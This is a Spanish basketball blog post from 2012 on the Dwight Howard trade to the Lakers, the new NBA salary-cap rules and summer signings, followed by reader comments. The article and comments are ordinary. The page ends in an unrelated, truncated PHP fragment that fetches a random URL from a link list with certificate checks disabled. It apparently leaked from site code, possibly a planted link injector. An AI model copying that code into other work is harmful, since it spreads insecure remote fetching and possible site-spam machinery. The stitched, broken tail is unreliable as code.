Reflexiones sobre la bocina #11

25 de September de 2012 por MagicJohnson32

TJNBA cerró por vacaciones el 6 de agosto. Parecía, por aquel entonces, que el mercado NBA había reducido la marcha tras un mes de julio repleto de rumores, traspasos y, por supuesto, el culebrón de Jeremy Lin. Disfrutábamos de los Juegos Olímpicos e intuíamos un agosto hipotenso, de guardar armas, un cese de las hostilidades hasta, al menos, la segunda quincena de septiembre. Pero nos hallábamos, sin saberlo, en vísperas de uno de esos raros movimientos que poseen el potencial de cambiar la fisonomía de la liga durante los años próximos: hablamos, claro está, del traspaso a cuatro bandas que convertía a Dwight Howard en jugador de Los Angeles Lakers. Durante nuestro período de letargo estival hubo más traspasos y firmas de agentes libres, y los detallaremos unas líneas más abajo, pero detengámonos un momento en el acuerdo que puso fin al ‘dwightmare’, excusa perfecta para la undécima edición de las Reflexiones sobre la bocina. Pensemos no tanto en sus implicaciones deportivas, que para eso ya llegarán nuestros tradicionales análisis previos de cada equipo, sino en lo supuestamente inesperado de un traspaso que, si bien pensado, era inevitable.

Kobe rueda de prensa

– “Y, en lugar de fichar a Nash y Howard y Jamison ¿no tendríamos que haber empezado por despedir a Mike Brown?”

¿Cómo nos pudo pillar desprevenidos? Si hasta nos había avisado Kobe Bryant. Prácticamente nos lo telegrafió cuando, sorprendentemente templado tras la derrota ante los Thunder en segunda ronda de los pasados Playoffs, se mostró convencido de que, pese a la situación de ahogo salarial en que se encuentran los Lakers, la franquicia encontraría la manera de reforzar la plantilla y convertirla en favorita al título: “They always do”. ¿Siempre? Si no siempre, sí al menos con una cierta frecuencia, y en la mayoría de las ocasiones eso ha pasado por firmar al mejor pívot del momento.

No hay más que hacer memoria. Veamos:

1947: George Mikan aterriza en los Minneapolis Lakers por sorteo tras el desmembramiento de la Professional Basketball League of America. Lleva a la franquicia a la obtención de cinco títulos hasta su retirada, nueve años después. 1968: Wilt Chamberlain, con su tercer MVP consecutivo bajo el brazo, es traspasado de los Sixers a los Lakers, con los que se proclamaría campeón en el 72. 1975: los Lakers se hacen con Kareem Abdul-Jabbar, ganador de un título y tres MVP vistiendo la camiseta de los Bucks; como Laker llegarían otros cinco anillos y tres MVP. 1996: Shaquille finaliza su contrato rookie con los Magic y se convierte en el agente libre más preciado del verano; reclutado para los Lakers por Jerry West, comandaría junto a Kobe Bryant la Dinastía que dio a la franquicia angelina el three-peat 2000-2002.

Moraleja, en caso de que el párrafo anterior no haya sido suficientemente revelador: los grandes pívots, aquellos llamados a dominar el juego como únicamente los pívots pueden hacer, acaban más tarde o más temprano por ir a los Lakers. O, extrapolando a modo de obviedad axiomática: los buenos jugadores van a los buenos equipos. ¿O alguien cree que lo de LeBron con Cleveland era algo personal?

Michael Jordan Isiah Thomas

Thomas: “Tú me banearás del Dream Team, pero yo solito pienso hundir una franquicia”
Jordan: “Espera a ver lo que haré yo con los Bobcats, que no existen todavía pero… Oye, esta conversación se está haciendo muy larga para un pie de foto ¿no crees?”

Y, sin embargo, pese a las evidencias, no lo vimos venir. ¿Cómo hemos estado tan ciegos? Posiblemente nos creímos el discurso con el que David Stern cantaba las bondades del nuevo convenio colectivo y -de paso- justificaba el lockout. Todo aquello sobre los fenomenales beneficios que este reluciente CBA iba a suponer para las franquicias ubicadas en ciudades consideradas como “mercados pequeños”. Ahora sí, gracias al nuevo convenio, ciudades como Charlotte o New Orleans disfrutarán de sus equipos compitiendo por el anillo. Al fin desentrañamos el misterio de las penurias de los Bobcats: no ha sido por la lamentable gestión de Jordan ¡es que el anterior convenio no le permitía competir!

Aunque uno desvía la mirada hacia San Antonio, mercado pequeño donde los haya, y no tiene la sensación de que necesiten ayuda para pergeñar, año tras año, un buen equipo. O fijémonos en los Thunder, modelo de reconstrucción desde cero, a partir de las cenizas de aquellos últimos Sonics post Ray Allen. La poderosísima Conferencia Oeste está comandada, así, por las franquicias de dos de los mercados más pequeños de la liga. O, mejor dicho, por dos de las franquicias mejor gestionadas de la liga. Porque de eso se trata. ¿O acaso no disponen Lakers y Clippers del mismo mercado desde el traslado de los últimos desde San Diego a Los Angeles en 1984? En todo este tiempo, mientras los Lakers ganaban ocho anillos, los L.A. Clippers se clasificaban para los Playoffs en cinco ocasiones y superaban un total de dos eliminatorias. La diferencia, evidentemente, no está en el mercado, sino en la gestión. De poco le ha servido a los Knicks durante las últimas cuatro décadas el disponer del mayor mercado del planeta -esta temporada se cumple el 40º aniversario del último anillo de los NYK. El más potente de los mercados no tiene nada que hacer ante los efectos devastadores de un, pongamos, Isiah Thomas de la vida.

Pero aceptemos, aunque sea por un momento, la premisa de base. Asumamos que las franquicias con mercados pequeños necesitaban un convenio colectivo que las favoreciese, y que ese es el que se firmó a finales de 2011 tras seis meses de negociaciones. Para ello, la NBA ha establecido un incremento progresivo de las penalizaciones por superar el límite salarial. Del “dólar por dólar” vigente hasta ahora, la penalización aumentará en la temporada 2013-2014 entre un 50 y un 325%, y para la 14-15 los que repitan como infractores verán incrementada la penalización hasta los 4,25$ por cada dólar. Estas medidas tienen como objetivo frenar a los derrochadores, los que buscan la competitividad exclusivamente a base de talonario, así como evitar los contratos absurdamente inflados, que son los que realmente comprometen tanto el éxito deportivo como la viabilidad económica de las franquicias.

Y en esas que llega el verano, y sucede que los que más gastaban se siguen reforzando. Kupchack se saca de la chistera las incorporaciones de Steve Nash, Antawn Jamison y Dwight Howard; Pat Riley suma a Ray Allen y Rashard Lewis para la causa de los Heat; Prokhorov logra las multimillonarias renovaciones de Deron Williams, Gerald Wallace, Brook Lopez y Kris Humphries, y además añade a Joe Johnson, Andray Blatche y Mirza Teletovic a los nuevos residentes del Barclays Center de Brooklyn, NY; los Celtics se aseguran la continuidad de Garnett, Jeff Green y Brandon Bass y, ante la espantada de Allen, refuerzan el perímetro con Courtney Lee y Jason Terry, a razón de 5 millones anuales cada uno de ellos. Tal vez la intención de la liga era estrechar las distancias entre las clases alta y baja, pero se corre el riesgo de obtener casi lo opuesto: la creación de una “aristocracia”, un selectísimo grupo de franquicias que puedan permitirse gastar por encima de lo que marca el límite salarial, frente al resto del pelotón. Una liga más asimétrica que nunca.

Omer Asik

– “Omer Asik no es mi nombre, significa ‘¡clin, caja!’ en turco”

Veamos ahora cómo está yendo la off season en cuanto al segundo objetivo, el de poner fin a los contratos demasiado elevados. El listado siguiente recoge únicamente contratos firmados este verano: JaVale McGee, 11 millones por temporada; Jeff Green, 9 millones por temporada; Kirilenko, 10 millones por temporada; George Hill, 8 millones por campaña; Ilyasova, 45 millones por cinco años; Serge Ibaka, 50 millones en cuatro años; Jameer Nelson, 8,5 millones por temporada; Nico Batum, 45 millones en cuatro años; Landry Fields, 19 millones en tres temporadas; Brook Lopez más Humphries más Wallace, 35 millones de dólares al año; Omer Asik más Jeremy Lin: 50 millones en tres temporadas.

¿Resultaría muy osado por nuestra parte asegurar que el propósito, así de entrada, parece destinado al  fracaso? Por lo visto estos tres últimos meses, los malos equipos van a seguir sobrepagando a los agentes libres y condenándose de esta manera a la mediocridad; los pívots van a seguir llevándose contratos ridículos, tal y como venía ocurriendo con cada uno de los convenios colectivos habidos en el pasado; y, tal y como venía ocurriendo, serán las franquicias mejor gestionadas las que se disputen el anillo. En el fondo, cabe desear que, pese al nuevo convenio, el lockout y las tensiones entre propietarios y jugadores, nada haya cambiado.

Lo que pasó mientras dormíamos

Como hemos comentando anteriormente, el día 6 de agosto bajamos la persiana y entramos en un estado de semi-hibernación del que prácticamente no salimos ni el día que estalló la “bomba Howard”. Al lado de semejante movimiento cualquier otro palidece en importancia pero es justo recordar los más interesantes, algunos de los cuales ya hemos avanzado un poco más arriba:

– CJ Miles recala en los Cleveland Cavaliers. El ex jugador de los Jazz llega para potenciar el juego exterior de la franquicia de Ohio y pinta a titular desde el primer día.
– Milwaukee incorpora a Joel Pryzbilla, que ejercerá de suplente de Samuel Dalembert. Con Monta Ellis y Brandon Jennings en el equipo toda ayuda reboteadora es poca.
– Los Lakers renovaron a Devin Ebanks y han fichado a Jodie Meeks, proveniente de los Sixers. La primera parte de la noticia no nos quita el sueño pero habrá que vigilar a Meeks, el ídolo del draft de la Hoops. Con Dwight Howard en el equipo, los tiradores ganan en importancia.
– Jeff Green ha renovado por los Celtics y Serge Ibaka ha extendido su contrato con los Thunder. El primero por 4 años y 36 millones de dólares (prácticamente lo mismo que Kendrick Perkins) y el segundo también por 4 años pero a cambio de 5o millones.
– Eduardo Najera, posiblemente mejor jugador mexicano de baloncesto de la historia, ha anunciado su retirada. Entrenará a los Texas Legend de la D-League.
– Washington ha firmado a Martell Webster, quien con Brandon Roy, Alex Shved y Chase Budinger se había quedado sin sitio en Minnesota. También es posible que no lo quisieran debido a su peinado o a cosas como esta.


– El mejor asistente de la temporada pasada en la NCAA, Scott Machado, firma por los Houston Rockets. La competencia es dura (Toney Douglas, Shaun Livingstone y, sobre todo, Jeremy Lin) pero seguro que su calidad le otorgará minutos.
– Andray Blatche buscará la redención en los Brooklyn Nets. Además, el equipo de Avery Johnson se ha hecho con Josh Childress.
– Matt Barnes cambia de equipo pero no de ciudad. El año que viene lo veremos con el rojo y blanco de Los Angeles Clippers.
– Terrence Williams y Jonny Flynn han firmado contratos no garantizados con los Pistons e intentarán ganarse en el training camp un sitio en el roster.
– Louis Amundson firma por los Wolves. Con él, el número de jugadores de raza blanca en el equipo sube a once, por solo cuatro de raza negra. Curioso.

Comenta

25 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Y los Kings ficharon a Aaron Brooks y James Johnson, no?

    Buenísimo artículo como siempre Magic, me ha parecido muy interesante el debate que abres sobre el primer año post lockout y las consecuencias reales que está teniendo. Ciertamente, puedes tener razón en lo que dices de la aristocracia que se refuerza, pero teóricamente ese impuesto de lujo de los equipos grandes debería ir a parar al fondo de compensación para que se lo repartan los equipos que sí hacen los deberes. Así que todo debería tender a igualarse en próximos años. Quizá ahora no, pero cuando empiecen a doler los impuestos de lujo con jugadores que no rinden lo que se esperaba de ellos, seguramente dejarán de pagar tanto. Eso le pasó a NY en la época de los contratos de Houston, Sprewell, Van Horn, Marbury, etc. y después, cuando entró el impuesto de lujo antiguo se moderaron bastante. Así que eso podría pasar a 3-4 años vista, cuando duela de verdad el impuesto de lujo y se terminen los contratos gordos. Dudo mucho que entonces equipos que estén en el impuesto de lujo duro, el de los 4 dólares, tengan ganas de firmar 20 millones por temporada a cualquier jugador… No sé, al final supongo que todo cuenta, tanto la gestión, como los mercados como el dinero que se pueda gastar cada magnate. Como bien comentas, hay jugadores que jamás irán a equipos pequeños, por muy buena gestión que hagan, y éstos a su vez tendrán que conformarse con medianías a precios de oro, porque es lo único que pueden traer, o esperar milagros en rondas de draft en años sucesivos, como Oklahoma. Lo de los Spurs sí que es ejemplo de gestión, auspiciado por Tim Dinastía, quizá una de las mejores elecciones de draft en toda la historia, y luego está el lado opuesto del tinglado con los Lakers, que tiran de chequera y fichan todo lo que se mueve. Veremos si esto cambia en próximos años o se amplían las diferencia como tú dices.

    En lo de los perros grandes de Lakers, déjame apuntarte que es curioso como en esa recopilación de pívots y anillos, no has puesto a Pau. No sé si es adrede porque no lo consideras uno de los mejores pívots que había en el mercado en ese momento, si es porque no consideras que haya cambiado para nada el rumbo o la historia de los Lakers, si es porque no lo consideras pívot…. me gustaría que lo explicases. Aún así, no veo a Howard al nivel de todos los anteriores que has nombrado, no sé si podrá darle 4 o 5 títulos al equipo. Lo digo por su actitud sobre todo

      Citar

  2. TheDeerHunter dice:
    #2

    Pau no está considerado como pívot prácticamente por nadie aunque cada día juegue más minutos ahí más circunstancialmente que otra cosa. Nominalmente es y será considerado un 4.
    Sin mencionar que como 5 para mí no tiene ni remotos puntos de comparación con los pívots míticos de la franquicia.

      Citar

  3. Blade Petrovic dice:
    #3

    Meeks va a ser un hombre importante esre año

      Citar

  4. Denise dice:
    #4

    Yo creo que lo del impuesto de lujo le beneficia ahora mas que nunca a los equipos grandes.

    Por ejemplo, unos Bucks posiblemente no se van a poder permitir estar muy por encima del limite por lo que tendrán que hacer equipos de 60 millones intentando acertar con sus rookies e intentando fichar (que no es facil) a jugadores infravalorados con salarios bajos poco acordes a su rendimiento.

    En cambio, si los Lakers saben que fichando a Howard y Nash, y al año siguiente mas estrellas y estrellas; ¿que les importa tener un salario de 100 millones mas un impuesto de lujo de otros 100 millones si Time Warner les da 5.000 millones por sus derechos televisivos en los próximos 25 años?

      Citar

  5. nba dice:
    #5

    Howard deberia darse con un canto en los dientes si consigue ganar un anillo, no creo que sobre sus espaldas se pueda edificar una dinastia, para hablar de dominio, pues habria que hablar de Shaq, eso si que era dominio.
    Pau esta en activo, en baloncesto fiba podría ser un 5, pero en NBA ahora es un 4-5.
    Supongo que la mistica que tienen Lakers-Celtics, hace que tengan mas facil atraer gente importante, aunque habría que hablar con Kobe para saber que paso durante su travesia por el desierto, hasta que llego Pau.
    Y Steve Blake, como no, haciendo de las suyas, parece que se ha lesionado en una tonteria,

      Citar

  6. MagicJohnson32 dice:
    #6

    @Sancho: realmente tengo dudas de cómo evolucionará la liga con el nuevo convenio, pero echando un vistazo al verano creo que el riesgo de la ‘asimetría’ es muy real, un poco lo que comenta Denise.

    Y sí, los Lakers tiran de chequera, pero sabes bien que en la NBA no es tan fácil como eso. Al fin y al cabo, Kobe Bryant es de los Lakers por una genialidad de Jerry West (genialidad doble, por ver el talento del jugador y por lograr el traspaso a cambio de Divac) y ahora Howard llega gracias a Bynum, que es una elección del draft. Y hace falta una gran gestión para conseguir traspasos como el de Chamberlain, el de Kareem, el de Gasol, el de Howard, etc.

    Sobre lo que me preguntas… Me lo pensé, pero es que lo de Gasol no fue lo mismo. En todos los otros casos los Lakers ensamblaban un equipo campeón a partir de la incorporación del mejor pívot existente en ese momento, condición que refrendaron en L.A.

    Y ya sé que la credibilidad de Dwight Howard como jugador dominante está en mínimos históricos. Parece que olvidamos el impacto tan brutal que supone, sobre todo en defensa (en serio que me alegro por el premio a Chandler pero ni de coña se puede comparar a Howard, vamos).

      Citar

  7. Sancho88 dice:
    #7

    Está claro que si se pone al tajo puede hacer 25-15 (o más) con total asiduidad, pero no sé, su actitud no me gusta. La comparación con O’Neal seguro que se la van a hacer, como un señor que llegó a unas finales con los Magic y después se fue a los Lakers. En ese sentido son historias paralelas, pero como dice nba, me parece que lo de O’Neal va para legendario (4 anillos y 3 MVP si mal no recuerdo?), y sin embargo Howard aún tiene que demostrar muchas más cosas para llegar a ser considerado un ilustre en la mítica lista de cincos de la franquicia. Y aún así, si lo demuestra, callará muchas bocas, pero creo que para muchos es irrepetible lo que hizo Shaq, porque Howard puede ganar anillos y aspirar al MVP si se centra, pero tiene que imprimir más carácter y no sé si tiene ese gen de brutalidad en la zona al nivel de O’Neal (yo diría que no), y en defensa me parecen dos jugadores soberbios los dos. Shaq era un auténtico tiburón, algo así como el Ronaldo Nazario del baloncesto, un killer, algo sobrenatural, y Howard lo veo como un niño gigantesco que intimida lo que quiere, pero que luego está un poco pasmarote en ataque, o al menos en los últimos dos años así lo he visto yo en los Magic…

    Entonces, yo pienso que a día de hoy, Lakers son favoritísimos al anillo por delante de cualquiera, pero sigo sin ver claro el rol de Pau en el equipo. Mismo entrenador, pívot de más calidad y dominio en la zona, por lo cual Pau no va a oler la pintura ni de lejos, dos años consecutivos giñándola en playoffs, las miradas inquisidoras de toda la prensa mundial y de Los Ángeles… no me extrañaría nada que si el Big Four 2.0 sale mal, Pau se vaya a la calle antes de febrero. No sé, es mi impresión.

      Citar

  8. Melo15 dice:
    #8

    Ahora es facil criticar a Howard, parece que nadie se acuerda ya de que con 24 añitos tenia a su equipo en lo mas alto del Este, que jugaban en una Conferencia mas facil? Que tenia un equipo muy completo y compensado tambien, pero los Cavs y los Celtics de hace dos años no eran precisamente unos rivales asequibles que diriamos…
    En conclusion, creo que Howard motivado es un tio que se centra y que ayuda al equipo pero cualquiera se desesperaria viendo como la han liado la directiva de los Magic estos ultimos años.

      Citar

  9. HisRoyalAirness dice:
    #9

    Enorme Magic, como siempre.

    Al margen del binomio mercados-gestión creo que hay un factor que, aunque a priori parezca absurdo, es fundamental a la hora de atraer agentes libres: la ciudad y el clima. No es de extrañar que Dallas, Los Angeles, Miami o NY sean de los destinos màs queridos así como Minnessota el que menos.
    Recuerdo a Shaq, cuando se le traspasó a los Heat exigiendo ir a un “sitio con sol”. Por eso se juntaron allí también los Bosh, Lebron y Wade. El tren de vida que te permiten estas ciudades no se tienen en otros lados

      Citar

  10. MagicJohnson32 dice:
    #10

    Florida, además del clima, tiene las tasas de impuestos más bajas del país, cosa que hace que el salario neto de los jugadores sea sensiblemente superior.

    Sancho, en cuanto actitud Shaq también dejaba mucho que desear. Mucho.

    Y para valorar el impacto de Howard no hay que compararlo con Shaq sino con los pívots de la actualidad, y Dwight es claramente el mejor C de la liga. Si nos ponemos a comparar a Howard y O’Neal podemos hablar de que Shaq era bastante mejor anotador y Dwight mejor reboteador, pero si en algo se parecen es en carácter y actitud. Aunque ya digo que esto es lo de menos.

      Citar

  11. Denise dice:
    #11

    Sobre la opinión de Sancho sobre Howard…yo creo que en los ultimos años progresó bastante, se le veían muchos mas movimientos. Es cierto que fuera de la pista ha mareado un poco a todo el mundo ultimamente con su “me quedo, no me quedo en Orlando” pero en la pista no se le puede poner peros, a día de hoy es el mejor de los pivots con bastante diferencia sobre el que me pongais como segundo.

    En los Lakers, la principal arma ofensiva seguirá siendo Kobe, aunque yo creo que lo mas acertado sería poner a DH, pero ya se sabe como son los roles. No habrá problemas, ya hay quien recoja las piedras de Kobe bajo los tableros.

    Y sobre el rol de Pau, lo veo una incógnita, si todo va rodado y los Lakers van en progresion del 72-10 que Metta predijo, está claro que no van a tocar las piezas, pero en cuanto haya una mini-crisis, el primer cabeza de turco va a ser Pau, está claro.

      Citar

  12. HisRoyalAirness dice:
    #12

    Pau lleva siendo cabeza de turco 2 años, no es ninguna novedad.
    A mí Howard no me parece el mejor center indiscutible de la liga, ni mucho menos y con Shaq ni lo voy a comparar porque me parece una blasfemia. Por talento baloncestístico puro creo que Bynum e incluso Marc son bastante mejores; juegan mejor en el poste y Marc además tiene un tiro decente de media distancia.
    Howard es mejor por su físico y su defensa, por eso y porque ha tenido que jugarse las lentejas en la Conferencia Este, cosa que digo siempre.

    Si me dais a elegir un”overall” claro que escogería a DH12, ya que puede aportar más y, aunque tenga pocas cualidades, las tiene potenciadísimas. Hablo del talento, no de otra cosa.

    Sigo sin ver qué equipo puede contrarrestar a 4 jugadores asì, por mucho que me digàis de la defensa y la edad de Nash. Ni siquiera veo a OKC ya que Artest simplemente va a estar ahí para repartir estopa y, al margen de Durant, el resto me parecen inferiores a sus pares

      Citar

  13. Sancho88 dice:
    #13

    Hombre, la final soñada sería Heat contra Lakers. Así como muchos ven el duelo entre Durant y Lebron, la nueva década, el duelo que durará hasta 2020, el pique por antonomasia desde Bird y Magic… yo creo que Lebron siempre ha estado picado con Bryant, y ese es el duelo real. Lebron va a por Jordan y Bryant para convertirse en un jugador legendario. De momento creo que esos son sus espejos donde mirarse, no Durant. Y los Heat con Allen, Lebron, Wade y Bosh… despacico con ellos también. Con Howard en los Lakers, OKC símplemente no tiene nada que hacer a 7 partidos. Indudable que Harden y Durant van a rendir, y que Westbrook le pondrá todas las ganas, pero quiero ver en unas finales de conferencia a Nash impartiendo cátedra, para mí, el tercer base de todos los tiempos por detrás de Magic y de Stockton

      Citar

  14. Denise dice:
    #14

    HisRoyalAirness:
    Pau lleva siendo cabeza de turco 2 años, no es ninguna novedad.
    A mí Howard no me parece el mejor center indiscutible de la liga, ni mucho menos y con Shaq ni lo voy a comparar porque me parece una blasfemia. Por talento baloncestístico puro creo que Bynum e incluso Marc son bastante mejores; juegan mejor en el poste y Marc además tiene un tiro decente de media distancia.
    Howard es mejor por su físico y su defensa, por eso y porque ha tenido que jugarse las lentejas en la Conferencia Este, cosa que digo siempre.

    Hombre, cada uno tiene sus gustos, pero si ultimamente se ha criticado a Howard por su imbecilidad fuera de las canchas…Bynum es bastante inmaduro, se despista a menudo y se lesiona frecuentemente. Me quedo con Howard 1000 veces. En estos momentos no creo que nadie eche de menos a Bynum en L.A.

    Y Marc es bueno, pero DH se lo come, y no solo gracias a su fisico, cuantos mastodontes de 7 pies fuertes y musuclosos hay y se quedan en nada o medianias.

      Citar

  15. Denise dice:
    #15

    HisRoyalAirness:

    , el resto me parecen inferiores a sus pares

    Ah, se me olvidó, yo el duelo Westbrook – Nash lo veo igualado e incluso favorable al de OKC. La potencia de Rusell debería de hacer sufrir bastante a un tipo de 38 años por muy listo que sea y muy bien que se conserve.

      Citar

  16. nba dice:
    #16

    Es que la clave de estos Lakers de ahora es si deciden jugar en equipo, si lo hacen son minimo finalistas de conferencia, sino, no pasaran de segunda ronda.

      Citar

  17. infante dice:
    #17

    Denise: Ah, se me olvidó, yo el duelo Westbrook – Nash lo veo igualado e incluso favorable al de OKC.La potencia de Rusell debería de hacer sufrir bastante a un tipo de 38 años por muy listo que sea y muy bien que se conserve.

    seguramente bryant cogera a westbrook, y nash se quedara con sefolosha

      Citar

  18. GreenPride dice:
    #18

    Bueno veo que empezamos pronto las polémicas sin que hayan ni empezado los training camps jeje como me gusta y claro estamos con los Lakers el equipo sobre el que van a estar los focos esta temporada. Para mí han hecho una gran plantilla y no sólo por Nash y Howard sino también por coger dos tíos que darán minutos de calidad desde el banco como Meeks y Jamison. Tienen al menos 8 jugadores de gran nivel y eso les hace candidatos al título.
    El tema Howard. Yo creo que está en el momento donde se decide el destino de su carrera como jugador de baloncesto. Ahora rodeado de compañeros con calidad all-star debe ser el elemento que marque diferencias en las pinturas para llevar al equipo al anillo. Yo espero de él que se centre y entienda lo importantes que van a ser estos años para él. Si quiere ser recordado y ganarse el puesto de mejor 5 del momento ya no valen excusas, tiene que rendir tanto en ataque como en defensa. Mi opinión sobre su carrera hasta el momento es que no pasa de ser un fenomenal 5 defensivo y reboteador pero muy limitado en ataque por lo que no ha llegado a ser tan decisivo como lo fue Shaq por ejemplo. Veremos cómo vuelve de su lesión y si los Lakers le van a dar balones en ataque de verdad o sólamente en pick&roll o rebotes de ataque. Si Mike Brown no le usa para empezar muchos ataques por dentro y construir a partir de ahí y le aisla como especialista defensivo será una gran decepción.
    Sobre los rivales, sinceramente creo que el Oeste queda entre Lakers y OKC a no ser que haya lesiones (con Clippers y Spurs como sorpresas improbables). En unas finales de conferencia entre ellos creo que el mayor problema de Lakers será el emparejamiento de Nash. Nash es un genio pero no tiene capacidad física para defender ni a Westbrook ni a Harden que probablemente se le meterán al poste para hacer sangre desde ahí. La ventaja Thunder es que Perkins siempre se ha mostrado como buen secante de Howard y si es así la presencia de Howard en ataque puede acabar quitando espacios a Pau que también tendrá un hueso enfrente con Ibaka. Quitando eso, Lakers necesitará que Metta o Jamison defiendan medio bien a Durantula y sobre todo provocar muchas más pérdidas que el año pasado yendo a las líneas de pase mucho más, confiando que Howard guarde la pintura mejor de lo que lo hacía Bynum y aprovechando que Perkins es nulo en ataque. Apasionante el duelo entre los dos y de momento yo lo dejaría sin pronóstico a falta de ver cómo van jugando los de LA

      Citar

  19. HisRoyalAirness dice:
    #19

    Teniendo en cuenta que cada vez se ven más defensas zonales en Playoffs no creo que el problema sea el emparejamiento de Nash. No es tonto y sabe molestar, y si le llevan al poste siempre se puede hacer un 2 contra 1 o sacar a uno de los grandes y metérselo encima.
    Además SIEMPRE ha terminado cogiendo Kobe a Westbrook y lo de Nash se resume en una cosa: vas a producir atacándole lo mismo que él contigo defendiendo?

      Citar

  20. TheDeerHunter dice:
    #20

      Citar

  21. Denise dice:
    #21

    TheDeerHunter:
    Esto da para otras reflexiones

    :S :S :S

    Dice que pretende ser un buen marido y buen padre…; yo discrepo, creo que eso es compatible con jugar en la NBA y más cuando ganas el dinero suficiente para llevarte a tu mujer y tus hijos a la ciudad donde juegas;
    que hay muchos viajes….pues si, pero tambien suele haber un par de rachas en las que juegas 7 partidos en casa …sin contar ya conque si tu equipo no entra en Playoffs tienes unos 5 meses y medio de vacaciones.

    En fin, lo siento por Dooling si fue abusado, pero que no me venga con milongas de que se retira porque no tiene tiempo de estar con los suyos..

      Citar

  22. Sancho88 dice:
    #22

    Que haga terapia con Kidd, que él sabe mucho de que abusen de él, jejeje.

    Pena este pavo, con lo que apuntaba antaño. Por fundamentos y tiro exterior seguía siendo aprovechable al cien por cien, y de hecho lo demostró en algunos partidos gordos de playoffs el año pasado… en fin, cuando las cabezas no dan para más no dan para más.

      Citar

  23. Denise dice:
    #23

    Sancho88:
    Que haga terapia con Kidd, que él sabe mucho de que abusen de él, jejeje.

    No pillo lo de Kidd…¿?

      Citar

  24. Sancho88 dice:
    #24

      Citar

  25. nba dice:
    #25

    Parece que a Lakers y a Wolves les ha entrado la vena compulsiva, y si son ciertas las informaciones que hay en otro sitio, a este paso van a tener 15 fichas, que despiporre.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>